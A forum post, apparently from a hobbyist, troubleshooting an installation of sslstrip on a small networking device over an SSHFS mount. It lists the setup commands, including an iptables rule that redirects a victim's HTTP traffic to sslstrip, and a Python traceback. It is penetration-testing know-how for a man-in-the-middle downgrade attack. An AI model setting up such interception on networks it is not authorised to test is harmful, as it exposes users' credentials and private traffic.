I started playing around with this today and thought I had it working... turns out, once I started browsing on the victim host, sslstrip threw a bunch of exception errors. I do not believe the problem was with my iptables though, I think it was with my installation over sshfs. Let me describe what I did to see if I was in the right direction...
1) SSH into turtle and enable, start, and verify SSHFS is operational (mounted at /sshfs)
2) Added a new line at the end of /etc/opkg.conf file.
dest sshfs /sshfs
3) Install sslstrip to mounted sshfs
opkg install --dest sshfs sslstrip
4) link to python2.7 dependencies (where I think my issues are....)
ln -s /sshfs/usr/lib/python2.7/ /usr/lib/python2.7
5) setup init file
touch /sshfs/usr/lib/python2.7/site-packages/zope/__init__.py
6) verify port forwarding is enabled (should be 1). Mine was already enabled by default
cat /proc/sys/net/ipv4/ip_forward
7) setup iptables to redirect traffic. I made sure to explicitly define the interface, maybe this is where you were having problems @telot?
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j REDIRECT --to-port 6969
8) start sslstrip
sslstrip -l 6969
It will function as normal until a website is requested, then sslstrip throws the following errors:
sslstrip 0.9 by Moxie Marlinspike running...
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
That makes it seem like my forwarding is working, but sslstrip is not... likely due to the sshfs mount... I wonder if the "thou shalt not install kernel modules on USB storage" also applies for SSHFS mounts. ;) - source https://dev.openwrt.org/ticket/10739
Tomorrow I am going to just download the standalone tarball and execute sslstrip without performing an installation and see what happens...